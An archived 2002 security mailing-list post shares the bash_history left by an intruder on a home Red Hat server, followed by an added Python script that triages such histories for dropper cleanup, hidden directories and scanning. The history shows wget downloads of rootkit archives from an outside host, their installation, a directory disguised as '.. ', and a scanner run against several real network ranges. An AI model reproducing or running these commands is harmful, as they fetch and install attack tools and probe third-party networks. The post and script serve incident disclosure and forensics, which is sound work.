Compromised Linux Box


Subject: Compromised Linux Box
From: Alan Caruth (saono@artificiallives.com)
Date: Mon Apr 22 2002 - 14:18:01 AKDT


Hello all,
A coworker has a web server running on his home network which has a fairly default Red Hat install on it. He opened up FTP without thinking, and within a short time frame he found that he had been compromised. The person didn't clean out any logs or anything after he was done, so it was fairly easy to track what he did.

I figured y'all might like to see the bash_history on this one. From what my coworker has said so far, after looking at his other logs, the attack came from an Asian nation's IP address. The person who hacked the machine has bunches of files on his website, in case anyone is interested in finding out what all he did (or might do) in any more detail.

---bash_history on
wget
wget cage.hypermart.net/LchRk.tgz
tar zxvf LchRk.tgz
cd cage
./fuckit
rm -rf LchRk.tgz
rm -rf cage
wget cage.hypermart.net/cage.tgz
tar zxvf cage.tgz
cd cage
./install
cd /usr/bin/".. "
ls
wget cage.hypermart.net/3rwu2.tgz
tar zxvf 3rwu2.tgz
rm -rf 3rwu2.tgz
./startwu 199.112.0.0 21
./startwu 128.12.0.0 21
./startwu 128.12.100.0 21
./startwu 128.12.154.0 21
./startwu 128.95.0.0 21

---bash_history off

Have a good one.
-Alan Caruth
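
A small triage script for a history file like the one above, added here as an example and not part of Alan's post or the tools it names: it flags a fetched archive that is later deleted, a cd into a directory named only with dots and spaces (like the /usr/bin/".. " here), and one tool run against several networks. The embedded history is a constructed, abridged copy of the quoted one; the regexes and function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: an abridged copy of the bash_history quoted in the post,
# embedded so the script runs offline (nothing is fetched or executed).
SAMPLE_HISTORY = """\
wget cage.hypermart.net/LchRk.tgz
tar zxvf LchRk.tgz
cd cage
rm -rf LchRk.tgz
rm -rf cage
cd /usr/bin/".. "
wget cage.hypermart.net/3rwu2.tgz
tar zxvf 3rwu2.tgz
rm -rf 3rwu2.tgz
./startwu 199.112.0.0 21
./startwu 128.12.0.0 21
./startwu 128.95.0.0 21
"""

FETCH = re.compile(r"^(?:wget|curl|ftp|lynx)\s+(\S+)$")
REMOVE = re.compile(r"^rm\s+-[rf]+\s+(\S+)$")
CD = re.compile(r"^cd\s+(.+)$")
# an executable followed by an IPv4 address and a port, repeated: a scanning loop
TARGETED = re.compile(r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d{1,5}$")

def odd_dirname(arg):
    """True when the last path component is only dots/whitespace (e.g. '.. '), which a casual ls overlooks."""
    name = arg.rstrip('"\'').rstrip("/").split("/")[-1].strip('"\'')
    return bool(name) and set(name) <= set(". ") and name not in (".", "..")

def triage_history(text):
    """Flag fetch-then-delete of a dropped archive, cd into a disguised directory, and a scanning loop."""
    findings = {"hidden_dirs": [], "dropper_cleanup": [], "scanners": []}
    fetched, targets = set(), defaultdict(set)
    for line in (l.strip() for l in text.splitlines()):
        if m := FETCH.match(line):
            fetched.add(m.group(1).rsplit("/", 1)[-1])  # remember the dropped file name
        elif (m := REMOVE.match(line)) and m.group(1) in fetched:
            findings["dropper_cleanup"].append(m.group(1))  # fetched, then removed: cleanup
        elif (m := CD.match(line)) and odd_dirname(m.group(1)):
            findings["hidden_dirs"].append(m.group(1))
        elif m := TARGETED.match(line):
            targets[m.group(1)].add(m.group(2))
    for exe, nets in targets.items():
        if len(nets) >= 2:  # same tool aimed at several networks
            findings["scanners"].append(f"{exe} against {len(nets)} networks")
    return findings
```

Run it against a real ~/.bash_history (or a copy taken during forensics) by passing the file contents to triage_history; the three lists are starting points for a timeline, not a verdict.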


This archive was generated by hypermail 2a23 : Mon Apr 22 2002 - 14:18:23 AKDT